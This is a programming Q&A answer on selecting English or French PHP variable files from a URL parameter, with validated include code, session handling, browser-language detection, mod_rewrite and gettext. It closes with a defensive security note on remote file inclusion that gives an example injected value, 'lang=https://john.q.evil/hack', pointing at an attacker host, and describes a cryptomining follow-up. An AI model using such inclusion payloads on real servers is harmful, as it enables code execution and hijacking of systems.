I have two PHP files, en.php and fr.php. One contains variables in English, the other in French, and I have to use the right file based on the URL. For example, if the URL ends in ?lang=en I have to use the English one, and vice versa. I am really new to PHP, which is why I’m asking here. Thanks!
Answer
Simple way
Keep the files in a specific directory, or strictly check the filename syntax.
This is because including the variables using require or include will execute whatever file the name points to, and that file might be on another server, under someone else’s control (see below, ‘injection’), running under the security context of your web server. You so do not want this to happen that it isn’t funny. So: check the file name.
$lang = 'en';
if (array_key_exists('lang', $_REQUEST)) {
    $test = $_REQUEST['lang'];
    // Verify "lang" is a two-letter string
    if (preg_match('#^[a-z]{2}$#', $test)) {
        // Verify the requested language file exists
        if (is_readable("./{$test}.php")) {
            $lang = $test;
        }
    }
}
// Finally include the file.
include_once("{$lang}.php");
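A stricter variant of the filename check is an allow-list, where the request only selects a key and never becomes part of the path. The following is a minimal sketch, not part of the original answer: the LANGUAGE_FILES constant, the languageFile() helper and the "lang" subdirectory are all hypothetical names chosen for illustration.

```php
<?php
// Hypothetical allow-list: language codes mapped to the files that may be
// included. The codes and the "lang" directory are assumptions.
const LANGUAGE_FILES = [
    'en' => 'en.php',
    'fr' => 'fr.php',
];

/**
 * Return the path of the language file for $requested, falling back to
 * $default when $requested is missing, not a string, or not on the list.
 */
function languageFile($requested, string $default = 'en'): string
{
    $code = (is_string($requested) && array_key_exists($requested, LANGUAGE_FILES))
        ? $requested
        : $default;

    return __DIR__ . '/lang/' . LANGUAGE_FILES[$code];
}

// Usage (commented out because the files are hypothetical):
// include_once languageFile($_GET['lang'] ?? null);
```

With this shape, a value such as a URL or "../../etc/passwd" simply fails the lookup and the default language is used.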
Remembering last used language
session_start();
$lang = 'en';
if (array_key_exists('lang', $_REQUEST)) {
    // ...as before...
    $lang = $test;
    $_SESSION['lang'] = $lang;
} else {
    if (array_key_exists('lang', $_SESSION)) {
        $lang = $_SESSION['lang'];
    }
}
// Finally include the file.
include_once("{$lang}.php");
More advanced: use a function to accept the language.
function validLanguage($test) {
    // Verify "lang" is a two-letter string
    if (preg_match('#^[a-z]{2}$#', $test)) {
        // Verify the requested language file exists
        if (is_readable("./{$test}.php")) {
            return $test;
        }
    }
    return null;
}
Now read it from browser.
PHP’s intl extension has a function, Locale::acceptFromHttp(), that detects which language the browser prefers.
// Assumes session_start() has already been called, as in the previous example.
$languages = array();
$languages[] = 'en'; // Default, with lowest priority
// Note: "en" default is not guaranteed to exist. You must ensure it does.

// Browser choice, with more priority than default.
// The header may be absent, and acceptFromHttp() returns false on failure.
if (class_exists('Locale') && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    $locale = Locale::acceptFromHttp($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if (is_string($locale)) {
        $test = substr($locale, 0, 2);
        if (null !== ($test = validLanguage($test))) {
            $languages[] = $test;
        }
    }
}

// Session, with more priority
if (array_key_exists('lang', $_SESSION)) {
    $languages[] = $_SESSION['lang'];
}

// Language selected, with even more priority
if (array_key_exists('lang', $_REQUEST)) {
    $test = $_REQUEST['lang'];
    if (null !== ($test = validLanguage($test))) {
        $languages[] = $test;
    }
}

// Pop best choice for language
$lang = array_pop($languages);
// Remember for the next time
$_SESSION['lang'] = $lang;
// Finally include the appropriate file.
include_once("{$lang}.php");
Apache mod_rewrite
With more experience you can, even afterwards, make it so that requesting https://yoursite.com/en/anypage.php is actually equivalent to requesting the ordinary https://yoursite.com/anypage.php?lang=en, using the Apache server’s mod_rewrite facility if you have it installed and activated. This gives you more user- and SEO-friendly URLs. More details in this answer.
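As a rough idea of what such a rule could look like, here is a sketch for an .htaccess file. It assumes the site lives at the document root, that mod_rewrite is enabled, that .htaccess overrides are allowed, and that language codes are always two lowercase letters; none of this comes from the original answer, so adapt it to your setup.

```apache
# Hypothetical .htaccess in the document root
RewriteEngine On

# /en/anypage.php  ->  /anypage.php?lang=en
# QSA keeps any existing query string, L stops further rule processing
RewriteRule ^([a-z]{2})/(.+\.php)$ /$2?lang=$1 [QSA,L]
```

The PHP side does not change: it still reads "lang" from the request and must still validate it.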
Doing this another way: using gettext and setlocale()
For the reasons detailed farther below, using include is not a very good idea after all. But usually you do this because you have something like
print "<h1>{$welcomeMessage}, {$username}!</h1>";
and you want to be able to say “Hello, John!” or “Bonjour, John!” or “Ciao, John”, depending.
In PHP you can do this in several ways. One of the more robust is through gettext. This requires you to rewrite the above code like this (note that “_” is a valid function name!):
print "<h1>" . _('WELCOME_MESSAGE') .", {$username}!</h1>";
and then maintain a special file called a pofile (a .po message catalog, which gettext reads in its compiled .mo form) that the underscore function can use.
This has several advantages in terms of memory usage and speed, and for professional use too: you can send an English pofile to, say, a professional Russian translator, and they will (usually) be able to work on it straight away, with less hassle and hence for less money. You can then purchase the appropriate pofile which, once uploaded, will translate your site (or the key parts of it) into Russian. You can even let your website owner (if you’re a third-party developer) supply their own pofiles.
The job of using the gettext framework can be made less awkward with this trick: tell PHP beforehand that whatever is output must pass through a filter function.
ob_start('my_translate');
And this function will parse the argument looking for specific telltales that some text needs translating, and if so, return its translation:
function my_translate($text) {
    // I will translate ??CAPITAL_STRINGS_IN_DOUBLE_QUESTION_MARKS??
    // The question marks are escaped: a bare "?" is a regex quantifier.
    $telltale = '#\?\?([A-Z][A-Z_0-9]+)\?\?#';
    return preg_replace_callback(
        $telltale,
        function ($matches) {
            return _($matches[1]);
        },
        $text
    );
}
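To try the telltale matching without a working gettext setup, the lookup can be replaced by a plain array. This is only a sketch under that assumption: translateTelltales() and the $catalogue array are hypothetical stand-ins for the gettext call, not part of the original answer.

```php
<?php
// Stand-in catalogue; with gettext in place, _() would do this lookup.
$catalogue = ['WELCOME' => 'Bonjour'];

function translateTelltales(string $text, array $catalogue): string
{
    return preg_replace_callback(
        // Same telltale syntax: ??CAPITAL_KEY??, question marks escaped
        '#\?\?([A-Z][A-Z_0-9]+)\?\?#',
        function (array $matches) use ($catalogue): string {
            // Unknown keys are left as they are, so a missing
            // translation stays visible in the page.
            return $catalogue[$matches[1]] ?? $matches[0];
        },
        $text
    );
}

echo translateTelltales('<h1>??WELCOME?? John!</h1>', $catalogue), "\n";
// prints: <h1>Bonjour John!</h1>
```

Leaving unknown keys untouched is a design choice for this sketch; gettext itself returns the message ID when no translation is found.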
So now your PHP code becomes
print "<h1>??WELCOME?? {$username}!</h1>";
and instead of include("{$lang}.php") you would have a more complicated sequence, but you need it in only one place:
// To guess actual OS, see this answer:
// https://stackoverflow.com/Questions/1482260/how-to-get-the-os-on-which-php-is-running
if ('Linux' === PHP_OS) {
    setlocale(LC_MESSAGES, $lang);
} else {
    putenv("LC_ALL={$lang}");
}
bindtextdomain('website', 'translations');
textdomain('website');
Also, you need to place the appropriate files in the “./translations” directory. In this example, $lang is a bit more complicated since it has to adhere to the “locale” syntax – so it would be “fr_FR” instead of “fr”.
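For orientation, gettext looks for compiled catalogs in a fixed layout below the directory given to bindtextdomain. The sketch below shows that layout for the “website” domain and the “fr_FR” locale; the WELCOME_MESSAGE entry and its translation are illustrative assumptions, and msgfmt is the GNU gettext tool that compiles a .po file into a .mo file.

```text
translations/
    fr_FR/
        LC_MESSAGES/
            website.po    (editable source)
            website.mo    (compiled: msgfmt website.po -o website.mo)

# Example entry in website.po
msgid "WELCOME_MESSAGE"
msgstr "Bonjour"
```

Only the .mo file is read at runtime, so it has to be regenerated whenever the .po file changes.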
Security note about PHP code injection
Imagine that your server isn’t particularly hardened (many aren’t; you’d be surprised), and that the name of the desired language is not checked or sanitized. And I, John Q. Evil, have reason to suspect this might be the case, or just want to check it out. I see “lang=en”, and I know what’s going on.
So I prepare a PHP script on my server and arrange for it to be served without being interpreted; accessing https://john.q.evil/hack.php will show you a PHP script complete with <?php start tags.
Then I access your site, and specify lang=https://john.q.evil/hack. Your web server obediently downloads and executes my code (PHP does this when its allow_url_include setting is enabled). My code, in turn, performs some diagnostics, determines that it’s running on a Whateverix 5 server on an ARM CPU as user daemon, and downloads another binary optimized for the Whateverix OS on ARM7 in unprivileged context. Then it executes that binary with shell_exec or in one of many other available ways. A few seconds later, your web server starts, say, mining cryptocoins to one of my disposable and deniable e-wallets.
This scenario is called a remote inclusion attack and is totally possible. As to “why should someone go to all this trouble on pretty little unknown me?”, well, the answer is indeed that they wouldn’t. But that’s because they wouldn’t need to, not personally, not intentionally. They would instead deploy a crawler bot designed to efficiently locate all web servers that might be exploitable in such a way, and catch them all.
Why? Well, if I could infect, say, one thousand web servers, I could realistically siphon 15-20 watts of computing power from each of them without attracting much notice. For free. At the end of a year, that should translate to around 2000 US dollars that I cash in, having done absolutely nothing more than the initial setup. But the number of potentially vulnerable websites is much more than a paltry one thousand. Reaching 20,000 infected websites would begin to be a lucrative paying job (40K/yr), and tax-free to boot.
That’s why miner malware is an industry, and this is why you need to always sanitize your inputs.